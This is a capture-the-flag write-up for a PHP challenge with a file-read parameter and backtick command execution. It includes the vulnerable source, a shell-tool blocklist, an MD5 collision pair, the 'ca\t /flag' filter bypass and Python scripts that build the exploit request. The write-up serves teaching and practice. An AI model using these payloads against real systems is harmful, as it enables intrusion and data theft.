lixin666

First look at the img parameter; the value after it looks encoded.

Decoding it twice with base64 gives the string 3535352e706e67. That is hex, so convert it to text.

It decodes to 555.png, the image's file name; this may be useful later.

Reverse the same pipeline for index.php: convert it to hex first, then base64-encode it twice.

That gives TmprMlpUWTBOalUzT0RKbE56QTJPRGN3. Put it into img and try it.

The page comes back with the file as a base64 string; decoding it gives the source:

<?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd']))
    header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
// img is double-base64 + hex encoded; this reverses it into a file name
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));

// everything outside [a-zA-Z0-9.] is stripped, so "/" never reaches file_get_contents
$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
    echo '<img src ="./ctf3.jpeg">';
    die("xixi~ no flag");
} else {
    // arbitrary file read: the file comes back base64-encoded inside a data: URI
    $txt = base64_encode(file_get_contents($file));
    echo "<img src='data:image/gif;base64," . $txt . "'></img>";
    echo "<br>";
}
echo $cmd;
echo "<br>";
// command blocklist applied to cmd
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
    echo("forbid ~");
    echo "<br>";
} else {
    // strict (===) comparison of the digests: two different strings with the same md5 are needed
    if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;   // command execution via backticks
    } else {
        echo ("md5 is funny ~");
    }
}

?>
<html>
<style>
body{
background:url(./bj.png) no-repeat center center;
background-size:cover;
background-attachment:fixed;
background-color:#CCCCCC;
}
</style>
<body>
</body>
</html>
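Rather than hand-encoding every file name, the img pipeline can be scripted. The following Python helper is my own addition to this writeup, not part of the challenge or the original post; it reproduces what index.php does with img (double base64, then hex2bin, then the preg_replace and the flag check) so you can predict which file the server will actually open, and it pulls the file out of the data: URI the page returns. The only assumption is the sample response at the bottom, which is constructed here in the shape index.php emits; no real server is contacted.

```python
import base64
import re


def encode_img(filename: str) -> str:
    """Build the img parameter: filename -> hex -> base64 -> base64."""
    hexed = filename.encode().hex().encode()
    return base64.b64encode(base64.b64encode(hexed)).decode()


def _b64decode_lenient(s) -> bytes:
    # PHP's base64_decode accepts missing '=' padding (the challenge's own img
    # value is 27 characters long); Python's does not, so pad it back first.
    if isinstance(s, str):
        s = s.encode()
    return base64.b64decode(s + b"=" * (-len(s) % 4))


def decode_img(param: str) -> str:
    """Reverse the pipeline exactly as index.php does: double base64, then hex2bin."""
    hexed = _b64decode_lenient(_b64decode_lenient(param))
    return bytes.fromhex(hexed.decode()).decode(errors="replace")


def server_target(param: str) -> tuple:
    """Return (name passed to file_get_contents, allowed?) for a given img value.
    preg_replace("/[^a-zA-Z0-9.]+/", "", ...) strips every '/' so directory
    traversal is useless here, and any name containing 'flag' is refused."""
    name = re.sub(r"[^a-zA-Z0-9.]+", "", decode_img(param))
    return name, re.search(r"flag", name, re.I) is None


DATA_URI = re.compile(r"data:image/gif;base64,([A-Za-z0-9+/=]+)")


def extract_file(html: str) -> bytes:
    """Pull the base64 file contents out of the <img src='data:...'> the page returns."""
    m = DATA_URI.search(html)
    if not m:
        raise ValueError("no data: URI in response (file refused or empty)")
    return _b64decode_lenient(m.group(1))


# Constructed stand-in for a server response, in the same shape index.php emits.
SAMPLE_SOURCE = b"<?php echo 'hello'; ?>"


def sample_response() -> str:
    return ("<img src='data:image/gif;base64,"
            + base64.b64encode(SAMPLE_SOURCE).decode() + "'></img><br>")


if __name__ == "__main__":
    print(decode_img("TXpVek5UTTFNbVUzTURabE5qYz0"))   # 555.png
    print(encode_img("index.php"))                    # TmprMlpUWTBOalUzT0RKbE56QTJPRGN3
    for name in ("index.php", "../flag", "/etc/passwd"):
        print(name, "->", server_target(encode_img(name)))
    print(extract_file(sample_response()))
```

Running it shows why `index.php` works while `../flag` and `/etc/passwd` do not: the slashes are stripped before the file is opened, and anything still containing `flag` dies with "xixi~ no flag".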

The key is still to bypass the md5 check so the two compare equal. I couldn't do it and looked at other people's solutions.

 

if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b']))

This is the key statement. Bypass it with an MD5 strong collision: two different byte strings with the same MD5 digest, so that !== holds on the raw strings while === holds on the hashes.

a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2

b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2

Going back to the source, note that the regex blocks many more characters. Send the request through the interception proxy so the colliding pair goes in the POST body.

Checking the filter: cat is blocked, but a lone backslash is not (the "\\|\\\\" in the pattern only matches a pipe followed by a backslash), so use cmd=ca\t%20/flag to read the flag from the root directory; the shell drops the backslash and runs cat /flag.

This gives the flag.
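To check the whole chain offline before sending it, here is a Python script I added to this writeup (not part of the challenge or the original post). It decodes the colliding pair above and runs it through a mirror of the PHP md5 gate, replays the command blocklist as PCRE sees it after PHP has processed the double-quoted string, shows what a POSIX shell makes of `ca\t /flag` (shlex follows the same unquoted-backslash rule; the server's shell being POSIX is an assumption), and assembles the final request using the page's own img value. The pair is Marc Stevens' single-block MD5 collision, copied verbatim from the lines above.

```python
import hashlib
import re
import shlex
from urllib.parse import quote, unquote_to_bytes

# The colliding pair from the writeup, still percent-encoded as sent in the POST body.
A_ENC = "%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2"
B_ENC = "%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2"


def collision_pair() -> tuple:
    """Decode the percent-encoded pair into the raw 64-byte messages PHP receives."""
    return unquote_to_bytes(A_ENC), unquote_to_bytes(B_ENC)


def md5_check_passes(a: bytes, b: bytes) -> bool:
    """Mirror of the PHP gate:
    (string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])
    Strict comparison on the hex digests, so the 0e... "magic hash" pairs that only
    work under == are rejected here; a genuine collision is required."""
    return a != b and hashlib.md5(a).hexdigest() == hashlib.md5(b).hexdigest()


# The blocklist as PCRE sees it after PHP unescapes the double-quoted source string:
# "\\|\\\\" collapses to \|\\ , i.e. ONE alternative matching a pipe followed by a
# backslash, so a lone backslash in cmd is not caught.
CMD_FILTER = re.compile(
    r'ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless'
    r'|pcre|paste|diff|file|echo|sh'
    r'|\'|"|`|;|,|\*|\?|\|\\|\n|\t|\r|\xA0|\{|\}|\(|\)|&[^\d]|@|\||\$|\[|\]|-|<|>',
    re.I,
)


def cmd_blocked(cmd: str) -> bool:
    return CMD_FILTER.search(cmd) is not None


def shell_words(cmd: str) -> list:
    """What the shell behind `$cmd` executes: an unquoted backslash outside quotes
    is dropped by a POSIX shell, so ca\\t becomes cat (assumed POSIX shell)."""
    return shlex.split(cmd)


def build_request(cmd: str) -> dict:
    """Assemble the final request: cmd in the query string (backslash left raw,
    space as %20, as in the writeup), the colliding pair in the body."""
    if cmd_blocked(cmd):
        raise ValueError(f"cmd would hit the filter: {cmd!r}")
    return {
        "method": "POST",
        "url": "/index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=" + quote(cmd, safe="/\\"),
        "body": f"a={A_ENC}&b={B_ENC}",
    }


if __name__ == "__main__":
    a, b = collision_pair()
    print("md5 gate passes:", md5_check_passes(a, b), hashlib.md5(a).hexdigest())
    for c in ("cat /flag", "ca\\t /flag"):
        print(repr(c), "blocked" if cmd_blocked(c) else "passes ->", shell_words(c))
    print(build_request("ca\\t /flag"))
```

The `0e`-style pairs (QNKCDZO / 240610708) are rejected by this gate because the digests are compared with ===, and `a[]=1&b[]=2` is out too because the (string) cast turns both arrays into "Array"; that is why the writeup needs real colliding bytes in the POST body.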
